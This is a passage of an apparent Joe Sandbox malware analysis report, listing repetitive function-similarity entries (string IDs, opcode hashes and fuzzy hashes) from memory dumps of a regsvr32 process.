                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -+$0u$S$e!
                                                                                            • API String ID: 0-4217091389
                                                                                            • Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                            • Instruction ID: 21333cb55570fba61ead478d555be2cf97ee8d0bb5591760fdc2d1cb1a8e7c11
                                                                                            • Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                            • Instruction Fuzzy Hash: 4441E3B090474A8FDB48DF64C89A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: o$"B$SJ$wU
                                                                                            • API String ID: 0-691100934
                                                                                            • Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                            • Instruction ID: f8ebb9d09f118da40760ec4d0a0c81fef07765976798fe6f718a46ae72584cff
                                                                                            • Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                            • Instruction Fuzzy Hash: 8E41E0B180078ECFDB48CF68C88A5DEBBF0FB58358F104619E859A6254D3B89695CFC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 9luJ$=2y}$=2y}$b
                                                                                            • API String ID: 0-1667874806
                                                                                            • Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                            • Instruction ID: 8a2c245cd1d33ff3e49584b9ba65031cf653155a1ac17c846e1eb5cb28c52a06
                                                                                            • Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                            • Instruction Fuzzy Hash: E241D6B181038EDFDF44CF64D88A4CE7BB0FB18358F110A19F865A62A4D3B89665CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ;$O,$fdu
                                                                                            • API String ID: 0-1721916326
                                                                                            • Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                            • Instruction ID: 41fd30cfdef22359591c661e631470774039f0396d910ecd634da2f607cae6fc
                                                                                            • Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                            • Instruction Fuzzy Hash: 23A10371D14718EBDB5CDFA8E8C999EBBB1FB54314F00421AE806A72A1CB78A945CF41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: u$&v$f
                                                                                            • API String ID: 0-1868853588
                                                                                            • Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                            • Instruction ID: ab88caf7bb86d76a1e0afcd148e09488b7f343faccb6e9dc348cc2a3ba839a7f
                                                                                            • Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                            • Instruction Fuzzy Hash: C3713471D04709EBDB1CDFA8E5C919DBBB1FB44314F10412DE416A72A1CB789945CF81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: o$j$t
• API String ID: 0-2067604139
• Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
• Instruction ID: 8d88195890027ef21b502b0be079548475bed57d8a4e69fcacc8c54fda8909b1
• Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
• Instruction Fuzzy Hash: 0F61EF705087848BD768DF28C18A55FBBF1FBC6704F104A1DE68A9B2A0D77AD844CB43
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: P$KGRa$wy
• API String ID: 0-4077564265
• Opcode ID: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
• Instruction ID: e67063a49b9a6773debea9c56a07d7d9f7750ca38b8f4544f15262a293e21417
• Opcode Fuzzy Hash: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
• Instruction Fuzzy Hash: F241C0B090074A8BDF48CF68C8865DE7FB0FB68348F51461DE84AA6290D37896A4CFC4
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: =$N@`Y$`Y
• API String ID: 0-2183226064
• Opcode ID: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
• Instruction ID: 7ac51709a089332b97f694898c87138605217839b3d47701a2fcca0a2fefd023
• Opcode Fuzzy Hash: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
• Instruction Fuzzy Hash: 3551C2B190074E8FDB44CF68C88A4DE7FB0FB68398F204619F856A6250D3B496A4CFD4
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: '0$~?$\
• API String ID: 0-629757258
• Opcode ID: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
• Instruction ID: 84f2d81bda0b252865636818e550008d1eca5e84af041749ca159cd552e989f8
• Opcode Fuzzy Hash: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
• Instruction Fuzzy Hash: F741CEB0548B808BE718CF28C59A51ABBF1FBC5344F604A2DF6968A3A0D774D885CF42
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: A7$z$~*b
• API String ID: 0-275545515
• Opcode ID: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
• Instruction ID: 8c617503316829237258fe3884cc044a343a17b4d6b70982d7054a648ba2e3f4
• Opcode Fuzzy Hash: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
• Instruction Fuzzy Hash: D341C4B180074ECFDB48CF64C48A5DE7FB0FB64398F204619E855A6250D3B896A9CFD5
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: H$rTk=${,%
• API String ID: 0-3174111592
• Opcode ID: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
• Instruction ID: 098befeb913c2e597e771e1fd630b20a73017df7a5e47bad055fbe828ba1442e
• Opcode Fuzzy Hash: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
• Instruction Fuzzy Hash: 1731E970528785ABD798DF28C4CA91EBBE1FBC4354F906A1CF5C2862A1C779D445CB03
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
• Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
• Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
• Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
• Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
Similarity
• API ID: LinkObjectOpenSymbolic
• String ID:
• API String ID: 3706036087-0
• Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
• Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
• Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
• Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: D?"$8zfK
• API String ID: 0-617590365
• Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
• Instruction ID: 2228e79c484956accb9c5151e3ebfbff804322fa4625dd7bb206a413294715f6
• Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
• Instruction Fuzzy Hash: 2C12F2B550560DCBDB68DF38C48A49E3BE1FF58304F205129FC269B2A2D774D964CB85
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #X$h}
• API String ID: 0-3021649463
• Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
• Instruction ID: 64e35d32618ed556758d7fb4b6d6747306be72dc100f1a9f2967f67973df2116
• Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
• Instruction Fuzzy Hash: A22296709096888BEBF9DF24C889AD97BF0FF44704F90251ED84EAA650DB7C6645CF42
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #X$+ <
• API String ID: 0-1007305072
• Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
• Instruction ID: 76955c5bc4ec5e5675efab1de2e59f961e26cbcd4d0d055ebd4a64a130198000
• Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
• Instruction Fuzzy Hash: 440278B5900709CFDB88CF68C58A5DD7BB9FB59308F404129FC1E9A2A0D3B4E919CB56
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: Hc$aYG
• API String ID: 0-2147329803
• Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
• Instruction ID: 01fbaf48f275129e93a6e32bf10c0af99fce7d321f3c87ecf35433a8b1b63a7f
• Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
• Instruction Fuzzy Hash: 90D1117560170DCBDB68CF28C58A59E3BE9FF54308F504129FC1E862A5D7B8E829CB46
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: Ip$2/
• API String ID: 0-2558650176
• Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
• Instruction ID: 34efac784f560ff468e9cac59e7019d94d27884e93f4820627d7cdb6ae297361
• Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
• Instruction Fuzzy Hash: F8E1C471505B888FEBB8DF24CC99BEB7BA0FB44306F20551AD849DE290DB785685CF41
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID: CreateProcess
• String ID: h$j-`
• API String ID: 963392458-2572860821
• Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
• Instruction ID: ca7ba3d67c873a10d3801fbe2177a2ad1f88d3b2d5ceb278fba2c161527f32ac
• Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
• Instruction Fuzzy Hash: C2C1E371904788CFDF6CDFA8C88A59DBBB1FB58308F20421DE916AB661DBB49845CF41
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #z$UP
• API String ID: 0-3609392360
• Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
• Instruction ID: c1fb44543fa92a274cc6504c4d568c05777e9b98bd1801879c5314bd0faf0d79
• Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
• Instruction Fuzzy Hash: 9CA13771904609DBDF58DFA8E4CA49EBBB0FB64344F20451DF846A72A0CB789995CFC2
Uniqueness
Uniqueness Score: -1.00%

Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: )bkr$z~
                                                                                            • API String ID: 0-4035444816
                                                                                            • Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                            • Instruction ID: 9521b67ba0c50b9f928b5e6dc2ed5c0f2243a51fd3ea7106f73ff16657ca37bf
                                                                                            • Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                            • Instruction Fuzzy Hash: 0C817C71514789CFEBB88F28CC8A7D937A0FB45314F608219DD8ECA291DFB85A4D9B41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: aK>$NM
                                                                                            • API String ID: 0-1076587397
                                                                                            • Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                            • Instruction ID: bdc74719ecc616cda6e387f08f908814f8fa6bc420b14134507f307f58b36bba
                                                                                            • Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                            • Instruction Fuzzy Hash: E3B144B590030DCFDB98CF28C18A58D7BB8FB55348F505129FC1E9A2A1E3B5E614CB56
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: GcX$cy5X
                                                                                            • API String ID: 0-3427037236
                                                                                            • Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                            • Instruction ID: 46a54a7028a90f90ab8c06a4d6a5d6ee546049df270cb43c62a1cf61b3b27170
                                                                                            • Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                            • Instruction Fuzzy Hash: EDA1C7B0548388CBEBBEDF34D89A6D93BA9FB44704F504619E80E8E290DF745745CB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: &$U
                                                                                            • API String ID: 0-326847644
                                                                                            • Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                            • Instruction ID: fa7e975f921b9fbf1657bac7617bf385ac792ae4eca269386bdd8ff9fdb8818c
                                                                                            • Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                            • Instruction Fuzzy Hash: 199169B590038E8FDF48CF68D88A5DE7BB0FB14348F104A19FC66AA250D7B4D665CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: k' {$z5
                                                                                            • API String ID: 0-3484172565
                                                                                            • Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                            • Instruction ID: cf276cbed6f1726c8a7aa603958485cee85067b48a1f64949bf0d6d71bf807d3
                                                                                            • Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                            • Instruction Fuzzy Hash: B471F770600749CFDB48DF28C88A5DE7BA1FB58348F114329EC8AAB251D778D954CBC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$D
                                                                                            • API String ID: 0-3309211938
                                                                                            • Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                            • Instruction ID: 2861088462c5be5e35d5194bee842517ee56e006db859bca736c89369c04e7cb
                                                                                            • Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                            • Instruction Fuzzy Hash: 17512D70524789ABDB98CF28DC8A9993BA4FB15304F90626DFD86C7252C778D886CB41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #T$(Pv0
                                                                                            • API String ID: 0-2531358951
                                                                                            • Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                            • Instruction ID: 7ac9ba4d3f2d2747e3cbd0d14ae099be98b6cd5d2b6c1b915bf8818493bbe5e3
                                                                                            • Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                            • Instruction Fuzzy Hash: 31512FB050070E8BDF58DF14C88A4DE3BA0FB68398F251619FC4A96295D378D999CFC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$%9
                                                                                            • API String ID: 0-3031553271
                                                                                            • Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                            • Instruction ID: 8da8284ebe2c293df3f9b9f06114f1e2f3c91514f6672c6fe4aa680cd4022333
                                                                                            • Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                            • Instruction Fuzzy Hash: 8D412B7061CB84ABD798DF19C0D962ABAE1FB88714F90592EF48AC7291C738C944CB47
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: gd$s=z
                                                                                            • API String ID: 0-3301279615
                                                                                            • Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                            • Instruction ID: aa5d7c152d57af9d6fdf1790f499a54eb2f6a576db5490730323eef403844c58
                                                                                            • Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                            • Instruction Fuzzy Hash: F251E1B190030A8FDB48CF68D48A5DE7FB1FB68388F204219F856A6250D37886A4CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: !oW!$ke&Q
                                                                                            • API String ID: 0-419570616
                                                                                            • Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                            • Instruction ID: 94ae8c63bdf65f358bccd598a44367aab0c634bf02fdad99a01aca2e1709207e
                                                                                            • Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                            • Instruction Fuzzy Hash: 2E51D7B090074E8FDB48CF68C88A5DE7FB0FB68398F104619EC55A6290D7B496A5CFD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ?j|$P
                                                                                            • API String ID: 0-615948335
                                                                                            • Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                            • Instruction ID: bf3e6e47079eaa0c3886aa4d205772bd04a7bb65d407afea62eee33333146ed0
                                                                                            • Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                            • Instruction Fuzzy Hash: 7E41D3B090034A8FDB48CF64C48A5DE7FB1FB68388F50461DE816A6390D77896A4CFD1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: %$aI
                                                                                            • API String ID: 0-3604358270
                                                                                            • Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                            • Instruction ID: 3f20e1a47833844578fbc524b0c5a2be334a7a5aad641c41bb80460401ca91be
                                                                                            • Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
